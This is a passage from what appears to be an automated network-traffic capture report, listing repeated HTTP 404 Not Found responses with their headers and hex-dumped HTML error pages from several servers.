64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 04 Dec 2024 16:11:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 04 Dec 2024 16:11:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 04 Dec 2024 16:11:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 04 Dec 2024 16:11:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 16:12:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 16:12:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 16:12:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 16:12:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 16:12:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20m6JU3rRgAUMkqkd%2FM23ngdVPbfAwuGr0H%2FdmsEKRm9JSP2Gs64%2FhHUTTDSUbgL4E2WlApW1P4CwzvqX1H53A0SdOh%2BYXdfA866x%2B%2F%2BCOvBPZe4MuYg48NjwcYQe7i2XZh6F1UpD14xF8c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecd14148f26d9fd-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=123993&min_rtt=123993&rtt_var=61996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 